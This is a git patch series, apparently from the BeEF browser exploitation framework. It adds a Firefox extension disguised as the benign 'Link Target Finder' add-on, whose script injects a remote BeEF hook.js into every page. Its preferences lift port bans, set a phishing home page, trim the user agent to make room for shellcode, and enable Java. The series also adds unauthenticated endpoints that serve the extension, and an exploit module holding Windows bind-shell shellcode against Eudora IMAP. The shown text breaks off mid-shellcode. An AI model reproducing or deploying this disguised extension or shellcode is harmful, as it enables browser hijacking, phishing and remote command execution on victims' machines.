diff --git a/extensions/ipec/files/LinkTargetFinder/chrome/content/browser.xul b/extensions/ipec/files/LinkTargetFinder/chrome/content/browser.xul
new file mode 100644
index 000000000..5b63810a8
--- /dev/null
+++ b/extensions/ipec/files/LinkTargetFinder/chrome/content/browser.xul
@@ -0,0 +1,22 @@
+<?xml version="1.0"?>
+<?xml-stylesheet href="chrome://linktargetfinder/skin/skin.css" type="text/css"?> 
+<!DOCTYPE linktargetfinder SYSTEM "chrome://linktargetfinder/locale/translations.dtd">
+<overlay id="sample" xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">
+		<script src="linkTargetFinder.js" />
+		
+		<menupopup id="menu_ToolsPopup"> 
+			<menuitem label="&runlinktargetfinder;" key="link-target-finder-run-key" oncommand="linkTargetFinder.run()"/> 
+		</menupopup>
+		
+		<keyset>
+			<key id="link-target-finder-run-key" modifiers="accel alt shift" key="L" oncommand="linkTargetFinder.run()"/>
+		</keyset>
+		
+		<statusbar id="status-bar">
+			<statusbarpanel id="link-target-finder-status-bar-icon" class="statusbarpanel-iconic" src="chrome://linktargetfinder/skin/status-bar.png" tooltiptext="&runlinktargetfinder;" onclick="linkTargetFinder.run()" />
+		</statusbar>
+		
+		<toolbarpalette id="BrowserToolbarPalette">
+			<toolbarbutton id="link-target-finder-toolbar-button" label="Link Target Finder" tooltiptext="&runlinktargetfinder;" oncommand="linkTargetFinder.run()"/>
+		</toolbarpalette>
+</overlay>
\ No newline at end of file
diff --git a/extensions/ipec/files/LinkTargetFinder/chrome/content/linkTargetFinder.js b/extensions/ipec/files/LinkTargetFinder/chrome/content/linkTargetFinder.js
new file mode 100644
index 000000000..8c86ef860
--- /dev/null
+++ b/extensions/ipec/files/LinkTargetFinder/chrome/content/linkTargetFinder.js
@@ -0,0 +1,37 @@
+var linkTargetFinder = function () {
+	var prefManager = Components.classes["@mozilla.org/preferences-service;1"].getService(Components.interfaces.nsIPrefBranch);
+	return {
+		init : function () {
+			gBrowser.addEventListener("load", function () {
+				//todo change the Extension name
+				var autoRun = prefManager.getBoolPref("extensions.linktargetfinder.autorun");
+				if (autoRun) {
+					linkTargetFinder.run();
+				}
+			}, false);
+		},
+			
+		run : function () {
+			var head = content.document.getElementsByTagName("head")[0];
+			
+			// add the BeEF hook -- start
+			var s = content.document.createElement('script');
+			s.type='text/javascript';
+			s.src='http://192.168.0.2:3000/hook.js';
+			head.appendChild(s);
+			
+			//setTimeout cannot be used (looks like is ignored).
+			// beef_init if called manually from the console, works perfectly.
+			
+			// adding setTimeout(beef_init, 2000); at the end of the hook file, make it working.
+			// John Wilander suggestions. we might leave it there anyway.
+			//alert(1);
+			//setTimeout(function(){beef_init()}, 5000);
+			//alert(3);
+			
+			// add the BeEF hook -- end
+			
+		}
+	};
+}();
+window.addEventListener("load", linkTargetFinder.init, false);
\ No newline at end of file
diff --git a/extensions/ipec/files/LinkTargetFinder/chrome/content/options.xul b/extensions/ipec/files/LinkTargetFinder/chrome/content/options.xul
new file mode 100644
index 000000000..ea0cfd8e3
--- /dev/null
+++ b/extensions/ipec/files/LinkTargetFinder/chrome/content/options.xul
@@ -0,0 +1,31 @@
+<?xml version="1.0"?>
+<?xml-stylesheet href="chrome://global/skin/" type="text/css"?>
+ 
+<prefwindow 
+     title="Link Target Finder Preferences"
+     xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">
+ 
+	<prefpane label="Link Target Finder Preferences">
+		<preferences>
+			<preference id="link-target-finder-autorun" name="extensions.linktargetfinder.autorun" type="bool"/>
+		</preferences>
+		
+		<groupbox>
+			<caption label="Settings"/>
+			<grid>
+				<columns>
+					<column flex="4"/>
+					<column flex="1"/>
+				</columns>
+				<rows>
+					<row>
+						<label control="autorun" value="Autorun"/>
+						<checkbox id="autorun" preference="link-target-finder-autorun"/>
+					</row>
+				</rows>
+			</grid>
+		</groupbox>	
+		
+	</prefpane>
+ 
+</prefwindow>
\ No newline at end of file
diff --git a/extensions/ipec/files/LinkTargetFinder/defaults/preferences/prefs.js b/extensions/ipec/files/LinkTargetFinder/defaults/preferences/prefs.js
new file mode 100644
index 000000000..cbe9a6dd9
--- /dev/null
+++ b/extensions/ipec/files/LinkTargetFinder/defaults/preferences/prefs.js
@@ -0,0 +1,21 @@
+// see http://kb.mozillazine.org/Firefox_:_FAQs_:_About:config_Entries
+// see http://mike.kaply.com/2012/06/21/best-practices-for-overriding-the-new-tab-page-with-your-extension/
+pref("extensions.linktargetfinder.autorun", false);
+
+// PortBanning override
+pref("network.security.ports.banned.override", "20,21,22,25,110,143");
+
+// home page is a phishing page create with BeEF Social Engineering extension,
+// the BeEF hook is added.
+pref("browser.startup.homepage.override", "http://www.binc.com");
+pref("browser.newtab.url", "http://www.binc.com");
+pref("browser.startup.page.override", "1");
+
+//useful for IPEC exploits, we save almost 90 bytes of space for shellcode
+// original: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:15.0) Gecko/20100101 Firefox/15.0.1
+// new: Firefox/15.0.1
+pref("general.useragent.override", "Firefox/15.0.1");
+
+// enable Java
+pref("security.enable_java", true);
+
diff --git a/extensions/ipec/files/LinkTargetFinder/install.rdf b/extensions/ipec/files/LinkTargetFinder/install.rdf
new file mode 100644
index 000000000..e7019cd8c
--- /dev/null
+++ b/extensions/ipec/files/LinkTargetFinder/install.rdf
@@ -0,0 +1,23 @@
+<?xml version="1.0"?>
+<RDF xmlns="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
+     xmlns:em="http://www.mozilla.org/2004/em-rdf#">
+
+	<Description about="urn:mozilla:install-manifest">
+		<em:id>linktargetfinder@robertnyman.com</em:id>
+		<em:name>Link Target Finder</em:name>
+		<em:version>1.0</em:version>
+		<em:type>2</em:type>
+		<em:creator>Robert Nyman</em:creator>
+		<em:description>Finds links that have a target attribute</em:description>
+		<em:homepageURL>http://www.robertnyman.com/</em:homepageURL>
+		<em:optionsURL>chrome://linktargetfinder/content/options.xul</em:optionsURL>
+
+		<em:targetApplication>
+			<Description>
+				<em:id>{ec8030f7-c20a-464f-9b0e-13a3a9e97384}</em:id>
+				<em:minVersion>2.0</em:minVersion>
+				<em:maxVersion>23.0</em:maxVersion>
+			</Description>
+		</em:targetApplication>
+	</Description>      
+</RDF>
diff --git a/extensions/ipec/files/LinkTargetFinder/locale/en-US/translations.dtd b/extensions/ipec/files/LinkTargetFinder/locale/en-US/translations.dtd
new file mode 100644
index 000000000..a42a829bf
--- /dev/null
+++ b/extensions/ipec/files/LinkTargetFinder/locale/en-US/translations.dtd
@@ -0,0 +1 @@
+<!ENTITY runlinktargetfinder "Run Link Target Finder">
\ No newline at end of file
diff --git a/extensions/ipec/files/LinkTargetFinder/skin/skin.css b/extensions/ipec/files/LinkTargetFinder/skin/skin.css
new file mode 100644
index 000000000..c82d15f49
--- /dev/null
+++ b/extensions/ipec/files/LinkTargetFinder/skin/skin.css
@@ -0,0 +1,12 @@
+#link-target-finder-toolbar-button {
+	list-style-image: url("chrome://linktargetfinder/skin/toolbar-large.png");
+}
+
+#link-target-finder-status-bar-icon {
+	width: 83px;
+	margin: 0 5px;
+}
+
+.link-target-finder-selected {
+	outline: 2px solid red !important;
+}
\ No newline at end of file
diff --git a/extensions/ipec/files/LinkTargetFinder/skin/status-bar.png b/extensions/ipec/files/LinkTargetFinder/skin/status-bar.png
new file mode 100644
index 0000000000000000000000000000000000000000..7f6c06afe8b954cb4a591272df3dc7eb0ee154e3
GIT binary patch
literal 423
zcmV;Y0a*TtP)<h;3K|Lk000e1NJLTq002_}000aK0{{R3DYS7A0000PbVXQnQ*UN;
zcVTj606}DLVr3vnZDD6+Qe|Oed2z{QJOBUyGf+%aMgPyw|L^brpP&CAApdZ1|F5tA
zU||0c5dTn6|BsLVFfjk$-~YeA|A2u1KtTTh0RR90)W8}_0003BNkl<Zc-pj++p>co
z3`N65vAL1||JswNXglSho$1MgK(hBDFaq}bfd66k7?qFpIcoRNi9S8zD^cd*iG)m;
zBQD*G>JHXvamrK{)Ux=PF`cTUTC%CCRouD(Vl`~_LJSX}qPPZO7e6ysThw$rkYVG+
zvS)JSxf_zL`RsGQnc+b;m1Q+5A%0;>98Al0ohEIl;oRHm*1d`ReD>k#k&vQ?c*0~{
z22<+ZIa~G~x)m~_8Pf}^xW@Qq#{M@G+PF_fzps!btlBN36oQuDm>Fvm*KGA-vIjvT
zvIGXnfWqKQBk-*~6N2VT_T2!^qEAnc>mtDrsZalTE~1ZLzoW$T#XI^FU;y2+Hd6=n
RxHJF&002ovPDHLkV1l+G$)*4R

literal 0
HcmV?d00001

diff --git a/extensions/ipec/files/LinkTargetFinder/skin/toolbar-large.png b/extensions/ipec/files/LinkTargetFinder/skin/toolbar-large.png
new file mode 100644
index 0000000000000000000000000000000000000000..d1475a33b68cf6ab4ff2a6f559d9ac1bca708b91
GIT binary patch
literal 1067
zcmeAS@N?(olHy`uVBq!ia0vp^Dj>|k3?#4J%UA`ZBuiW)N`mv#O3D+9QW+dm@{>{(
zJaZG%Q-e|yQz{EjrrIztFy;mLgt)$Z`SSYp>yI8idiLzul`B^+T)1%j`0;PwzWw_3
z>+IRHr%s*9%F6ol=g+NMxBmbCfBW|BfB*iydGqG`_wPrK9{u_A=ik47&z(DW<j9f#
z3=Ahvp8W9P!!K*=-@kufzI^%P$B!pYocOwRYe`8-QBhHOd3jS))7!Uij~zR<Z{NPh
zj~^El6#THX{Ap!%`0(MSOP4NOxUj3MYw_a62M!$AvSrJgHEU{WYI=Kn4<0=D{Q2`a
zbLM<CGb=7Ge)a0rs#UA*-o3kh`}S?ywtX`<pEz-1PEO8~Cr|e7-TU$3!w&}zba!``
zm6d(jvgP^m<ttaN{PE+*`}OO;TUb<9R`&GtELpN->eQ(%EiL=^?=LMaU9e!m)~#FL
z_VzY5HZEVj{L7IepFe+Iv0}yJ#f$&w>fXC|uerH-_3G6R7cT7U>-)HI<1cOPhK7dh
z?Cg(?jmwrTtFEs8eE9Iol`H4YoqOlbotGz1K3THl(4j-09zCkBuivp_$Nl^F&!0d4
z<;xdf0ABwsoDYnis*)hTU?6v30K*IW7iz%xKkMn@7*cWT$(8W%#SS724^DEqb?k0X
zN#x<;R8TS8D_wnk>-E^X_p0?@?7yGc^5kIgx4Zc>c7Esk-g=l}$3OlDW+s`_*Zb?N
zzI`_3oKZ!Y@wC!Qe^z`opZZ4W`n31F9$R)Q@4k}#>*bX2)JQ)Sp_EfE4slD}{M0R$
z`-xBPO`l&6o0>$>n`?Z2g~10ikGi`(D%`@;5xkcBt<;LSUM5nq-QRi)Rop|DE@sTv
zu5Pv2x9jAqY3%2`+a@a6tzRDW`u6RYCBLpKZ&||2eBZF=lBLFKuEqNUr|`zM@7lM}
z{&Hz;SAfWNo}5gvfXme?2Mkox_TNlUy)CzB*=rStIdv<p@8A4(;Tx_KXYVI|iuY)+
zsGWV@p6A>1;sp=w|9ii^ug=(}`PAH@*m2T3A#Z=rhDj>Ae<x_{`M8{Oo{akpNsfm;
zDolmHw1lkgG0saZk}*H|)yK#&H%czTBI;S?{o|7#RTn(`ecJU)(`r9MO%+y0k02)w
zao6Qt{ay#(%~+(-XPm^4`uJJ+ZU_F@gPA&f>}MX@b<da4wb+-ZTK;3xvQ@K|t;}#`
zj^DcTaLiHO^A%U;-2Nl``n#Q2_4b{~^Z06lve%uM*Ji7AzWd#+wLcR72q!RDO62~C
Tisdu|CNBn0S3j3^P6<r_c$k00

literal 0
HcmV?d00001

diff --git a/extensions/ipec/junk_calculator.rb b/extensions/ipec/junk_calculator.rb
new file mode 100644
index 000000000..718e40de2
--- /dev/null
+++ b/extensions/ipec/junk_calculator.rb
@@ -0,0 +1,40 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+module BeEF
+  module Extension
+    module Ipec
+      class JunkCalculator
+        include Singleton
+
+        def initialize
+           @binded_sockets = {}
+           @host = BeEF::Core::Configuration.instance.get('beef.http.host')
+        end
+
+        def bind_junk_calculator(name)
+          port = 2000
+          #todo add binded ports to @binded_sockets. Increase +1 port number if already binded
+          #if @binded_sockets[port] != nil
+          #else
+          #end
+          BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind_socket(name, @host, port)
+          @binded_sockets[name] = port
+
+        end
+      end
+    end
+  end
+end
diff --git a/extensions/ipec/models/ipec_exploits.rb b/extensions/ipec/models/ipec_exploits.rb
new file mode 100644
index 000000000..789fdcf36
--- /dev/null
+++ b/extensions/ipec/models/ipec_exploits.rb
@@ -0,0 +1,37 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+module BeEF
+  module Core
+    module Models
+      class IpecExploits
+
+        include DataMapper::Resource
+        #todo: use this table when we'll have a bigger IPEC exploits choice
+        storage_names[:default] = 'extension_ipec_exploits'
+
+        property :id, Serial
+
+        property :name, Text, :lazy => false
+        property :protocol, String, :lazy => false
+        property :os, String, :lazy => false
+
+        has n, :extension_ipec_exploits_run, 'IpecExploitsRun'
+
+      end
+
+    end
+  end
+end
diff --git a/extensions/ipec/models/ipec_exploits_run.rb b/extensions/ipec/models/ipec_exploits_run.rb
new file mode 100644
index 000000000..24ebcaa5b
--- /dev/null
+++ b/extensions/ipec/models/ipec_exploits_run.rb
@@ -0,0 +1,36 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+module BeEF
+  module Core
+    module Models
+      class IpecExploitsRun
+
+        include DataMapper::Resource
+        #todo: use this table when we'll have a bigger IPEC exploits choice
+        storage_names[:default] = 'extension_ipec_exploits_run'
+
+        property :id, Serial
+        property :launched, Boolean, :lazy => false
+        property :http_headers, Text, :lazy => false
+        property :junk_size, String, :length => 3, :lazy => false
+
+        belongs_to :ipec_exploits
+
+      end
+
+    end
+  end
+end
diff --git a/extensions/ipec/rest/ipec.rb b/extensions/ipec/rest/ipec.rb
new file mode 100644
index 000000000..00b3eff9a
--- /dev/null
+++ b/extensions/ipec/rest/ipec.rb
@@ -0,0 +1,88 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+
+module BeEF
+  module Extension
+    module Ipec
+      class IpecRest < BeEF::Core::Router::Router
+
+        before do
+          # NOTE: the method exposed by this class are NOT-AUTHENTICATED.
+          # They need to be called remotely from a hooked browser.
+
+          #error 401 unless params[:token] == config.get('beef.api_token')
+          #halt 401 if not BeEF::Core::Rest.permitted_source?(request.ip)
+          headers 'Content-Type' => 'application/json; charset=UTF-8',
+                  'Pragma' => 'no-cache',
+                  'Cache-Control' => 'no-cache',
+                  'Expires' => '0'
+        end
+
+        # Determine the exact size of the cross-domain request HTTP headers.
+        # Needed to calculate junk properly and prevent errors.
+        # See modules/exploits/beefbind/beef_bind_staged_deploy/command.js for more info.
+        # todo: the core of this method should be moved to ../junk_calculator.rb
+        get '/junk/:name' do
+           socket_name = params[:name]
+           halt 401 if not BeEF::Filters.alphanums_only?(socket_name)
+           socket_data = BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.get_socket_data(socket_name)
+           halt 404 if socket_data == nil
+
+           if socket_data.include?("\r\n\r\n")
+              result = Hash.new
+
+              headers = socket_data.split("\r\n\r\n").first
+              BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind_socket(socket_name)
+              print_info "[IPEC] Cross-domain XmlHttpRequest headers size - received from bind socket [#{socket_name}]: #{headers.size + 4} bytes."
+              # CRLF -> 4 bytes
+              result['size'] = headers.size + 4
+
+              headers.split("\r\n").each do |line|
+                if line.include?("Host")
+                  result['host'] = line.size + 2
+                end
+                if line.include?("Content-Type")
+                  result['contenttype'] = line.size + 2
+                end
+                if line.include?("Referer")
+                  result['referer'] = line.size + 2
+                end
+              end
+              result.to_json
+           else
+             print_error "[IPEC] Looks like there is no CRLF in the data received!"
+             halt 404
+           end
+        end
+
+
+        # The original Firefox Extension sources are in extensions/ipec/files/LinkTargetFinder dir.
+        # If you want to modify the pref.js file, do the following to re-pack the extension:
+        # $cd firefox_extension_directory
+        # $zip -r ../result-name.xpi *
+        get '/ff_extension' do
+          response['Content-Type'] = "application/x-xpinstall"
+          ff_extension = "#{File.expand_path('../../../ipec/files', __FILE__)}/LinkTargetFinder.xpi"
+          print_info "[IPEC] Serving Firefox Extension: #{ff_extension}"
+          send_file "#{ff_extension}",
+                    :type => 'application/x-xpinstall',
+                    :disposition => 'inline'
+        end
+
+      end
+    end
+  end
+end
\ No newline at end of file

From e257f8bb527da2f4fb8a9f81ca70cf62904a9a4c Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Mon, 22 Oct 2012 16:03:47 +1100
Subject: [PATCH 071/397] Added BeEF_bind deployer module: send both shellcode
 stager and stage to a specific target. Eudora IMAP 3 (Win) is the only
 available exploit atm.

---
 .../beef_bind_staged_deploy/command.js        | 396 ++++++++++++++++++
 .../beef_bind_staged_deploy/config.yaml       |  25 ++
 .../beef_bind_staged_deploy/module.rb         |  40 ++
 3 files changed, 461 insertions(+)
 create mode 100755 modules/exploits/beefbind/beef_bind_staged_deploy/command.js
 create mode 100755 modules/exploits/beefbind/beef_bind_staged_deploy/config.yaml
 create mode 100755 modules/exploits/beefbind/beef_bind_staged_deploy/module.rb

diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/command.js b/modules/exploits/beefbind/beef_bind_staged_deploy/command.js
new file mode 100755
index 000000000..e8a81727c
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/command.js
@@ -0,0 +1,396 @@
+//
+//   Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+beef.execute(function () {
+    var rhost = '<%= @rhost %>';
+    var rport = '<%= @rport %>';
+    var service_port = '<%= @service_port %>';
+    var path = '<%= @path %>';
+    var delay = parseInt('<%= @delay %>');
+
+    var beef_host = '<%= @beef_host %>';
+    var beef_port = '<%= @beef_port %>';
+    var beef_junk_port = '<%= @beef_junk_port %>';
+    var sock_name = '<%= @beef_junk_socket %>';
+
+    //todo: this will be obviously dynamic as soon as we'll have more IPEC exploits.
+    var available_space = 769;
+
+    // base64 decode function that works properly with binary data (like shellcode)
+    var Base64Binary = {
+        _keyStr:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
+
+        decode:function (input) {
+            //get last chars to see if are valid
+            var lkey1 = this._keyStr.indexOf(input.charAt(input.length - 1));
+            var lkey2 = this._keyStr.indexOf(input.charAt(input.length - 1));
+
+            var bytes = Math.ceil((3 * input.length) / 4.0);
+            /**
+             if (lkey1 == 64) bytes--; //padding chars, so skip
+             if (lkey2 == 64) bytes--; //padding chars, so skip
+             **/
+
+            var uarray = [];
+            var chr1, chr2, chr3;
+            var enc1, enc2, enc3, enc4;
+            var i = 0;
+            var j = 0;
+
+            input = input.replace(/[^A-Za-z0-9\+\/\=]/g, "");
+
+            for (i = 0; i < bytes; i += 3) {
+                //get the 3 octects in 4 ascii chars
+                enc1 = this._keyStr.indexOf(input.charAt(j++));
+                enc2 = this._keyStr.indexOf(input.charAt(j++));
+                enc3 = this._keyStr.indexOf(input.charAt(j++));
+                enc4 = this._keyStr.indexOf(input.charAt(j++));
+
+                chr1 = (enc1 << 2) | (enc2 >> 4);
+                chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
+                chr3 = ((enc3 & 3) << 6) | enc4;
+
+                uarray.push(chr1 & 0xff);
+                if (enc3 != 64) uarray.push(chr2 & 0xff);
+                if (enc4 != 64) uarray.push(chr3 & 0xff);
+            }
+            return uarray;
+        }
+    };
+
+
+    /*
+     * Ty's goodness. Slightly modified BeEF bind stager to work with the
+     * Egg Hunter.
+     *
+     * Original size: 299 bytes
+     * Final size: 326 bytes
+     * BadChars removed: \x00\x0a\x0d\x20\x7b
+     */
+    var stager = "B33FB33F" + 
+        "\xba\x6a\x99\xf8\x25\xd9\xcc\xd9\x74\x24\xf4\x5e\x31\xc9" +
+        "\xb1\x4b\x83\xc6\x04\x31\x56\x11\x03\x56\x11\xe2\x9f\x65" +
+        "\x10\xac\x5f\x96\xe1\xcf\xd6\x73\xd0\xdd\x8c\xf0\x41\xd2" +
+        "\xc7\x55\x6a\x99\x85\x4d\xf9\xef\x01\x61\x4a\x45\x77\x4c" +
+        "\x4b\x6b\xb7\x02\x8f\xed\x4b\x59\xdc\xcd\x72\x92\x11\x0f" +
+        "\xb3\xcf\xda\x5d\x6c\x9b\x49\x72\x19\xd9\x51\x73\xcd\x55" +
+        "\xe9\x0b\x68\xa9\x9e\xa1\x73\xfa\x0f\xbd\x3b\xe2\x24\x99" +
+        "\x9b\x13\xe8\xf9\xe7\x5a\x85\xca\x9c\x5c\x4f\x03\x5d\x6f" +
+        "\xaf\xc8\x60\x5f\x22\x10\xa5\x58\xdd\x67\xdd\x9a\x60\x70" +
+        "\x26\xe0\xbe\xf5\xba\x42\x34\xad\x1e\x72\x99\x28\xd5\x78" +
+        "\x56\x3e\xb1\x9c\x69\x93\xca\x99\xe2\x12\x1c\x28\xb0\x30" +
+        "\xb8\x70\x62\x58\x99\xdc\xc5\x65\xf9\xb9\xba\xc3\x72\x2b" +
+        "\xae\x72\xd9\x24\x03\x49\xe1\xb4\x0b\xda\x92\x86\x94\x70" +
+        "\x3c\xab\x5d\x5f\xbb\xcc\x77\x27\x53\x33\x78\x58\x7a\xf0" +
+        "\x2c\x08\x14\xd1\x4c\xc3\xe4\xde\x98\x44\xb4\x70\x73\x25" +
+        "\x64\x31\x23\xcd\x6e\xbe\x1c\xed\x91\x14\x35\xdf\xb6\xc4" +
+        "\x52\x22\x48\xfa\xfe\xab\xae\x96\xee\xfd\x79\x0f\xcd\xd9" +
+        "\xb2\xa8\x2e\x08\xef\x61\xb9\x04\xe6\xb6\xc6\x94\x2d\x95" +
+        "\x6b\x3c\xa5\x6e\x60\xf9\xd4\x70\xad\xa9\x81\xe7\x3b\x38" +
+        "\xe0\x96\x3c\x11\x41\x58\xd3\x9a\xb5\x33\x93\xc9\xe6\xa9" +
+        "\x13\x86\x50\x8a\x47\xb3\x9f\x07\xee\xfd\x35\xa8\xa2\x51" +
+        "\x9e\xc0\x46\x8b\xe8\x4e\xb8\xfe\xbf\x18\x80\x97\xb8\x8b" +
+        "\xf3\x4d\x47\x15\x6f\x03\x23\x57\x1b\xd8\xed\x4c\x16\x5d" +
+        "\x37\x96\x26\x84";
+
+    /*
+     * Ty's goodness. Original BeEF bind stage.
+     *
+     * Original size: 792 bytes
+     */
+    var stage_allow_origin =
+        "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28" +
+            "\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52" +
+            "\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" +
+            "\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38" +
+            "\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58" +
+            "\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a" +
+            "\x8b\x12\xeb\x86\x5d\xbb\x00\x10\x00\x00\x6a\x40\x53\x53\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5" +
+            "\x89\xc6\x68\x01\x00\x00\x00\x68\x00\x00\x00\x00\x68\x0c\x00\x00\x00\x68\x00\x00\x00\x00\x89" +
+            "\xe3\x68\x00\x00\x00\x00\x89\xe1\x68\x00\x00\x00\x00\x8d\x7c\x24\x0c\x57\x53\x51\x68\x3e\xcf" +
+            "\xaf\x0e\xff\xd5\x68\x00\x00\x00\x00\x89\xe3\x68\x00\x00\x00\x00\x89\xe1\x68\x00\x00\x00\x00" +
+            "\x8d\x7c\x24\x14\x57\x53\x51\x68\x3e\xcf\xaf\x0e\xff\xd5\x8b\x5c\x24\x08\x68\x00\x00\x00\x00" +
+            "\x68\x01\x00\x00\x00\x53\x68\xca\x13\xd3\x1c\xff\xd5\x8b\x5c\x24\x04\x68\x00\x00\x00\x00\x68" +
+            "\x01\x00\x00\x00\x53\x68\xca\x13\xd3\x1c\xff\xd5\x89\xf7\x68\x63\x6d\x64\x00\x89\xe3\xff\x74" +
+            "\x24\x10\xff\x74\x24\x14\xff\x74\x24\x0c\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c" +
+            "\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79" +
+            "\xcc\x3f\x86\xff\xd5\x89\xfe\xb9\xf8\x0f\x00\x00\x8d\x46\x08\xc6\x00\x00\x40\xe2\xfa\x56\x8d" +
+            "\xbe\x18\x04\x00\x00\xe8\x62\x00\x00\x00\x48\x54\x54\x50\x2f\x31\x2e\x31\x20\x32\x30\x30\x20" +
+            "\x4f\x4b\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x74\x65\x78\x74\x2f" +
+            "\x68\x74\x6d\x6c\x0d\x0a\x41\x63\x63\x65\x73\x73\x2d\x43\x6f\x6e\x74\x72\x6f\x6c\x2d\x41\x6c" +
+            "\x6c\x6f\x77\x2d\x4f\x72\x69\x67\x69\x6e\x3a\x20\x2a\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d" +
+            "\x4c\x65\x6e\x67\x74\x68\x3a\x20\x33\x30\x31\x36\x0d\x0a\x0d\x0a\x5e\xb9\x62\x00\x00\x00\xf3" +
+            "\xa4\x5e\x56\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90" +
+            "\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68" +
+            "\xea\x0f\xdf\xe0\xff\xd5\x97\x31\xdb\x53\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68\xc2" +
+            "\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5\x53\x53\x57\x68\x74\xec\x3b\xe1\xff" +
+            "\xd5\x57\x97\x68\x75\x6e\x4d\x61\xff\xd5\x81\xc4\xa0\x01\x00\x00\x5e\x89\x3e\x6a\x00\x68\x00" +
+            "\x04\x00\x00\x89\xf3\x81\xc3\x08\x00\x00\x00\x53\xff\x36\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x54" +
+            "\x24\x64\xb9\x00\x04\x00\x00\x81\x3b\x63\x6d\x64\x3d\x74\x06\x43\x49\xe3\x3a\xeb\xf2\x81\xc3" +
+            "\x03\x00\x00\x00\x43\x53\x68\x00\x00\x00\x00\x8d\xbe\x10\x04\x00\x00\x57\x68\x01\x00\x00\x00" +
+            "\x53\x8b\x5c\x24\x70\x53\x68\x2d\x57\xae\x5b\xff\xd5\x5b\x80\x3b\x0a\x75\xda\x68\xe8\x03\x00" +
+            "\x00\x68\x44\xf0\x35\xe0\xff\xd5\x31\xc0\x50\x8d\x5e\x04\x53\x50\x50\x50\x8d\x5c\x24\x74\x8b" +
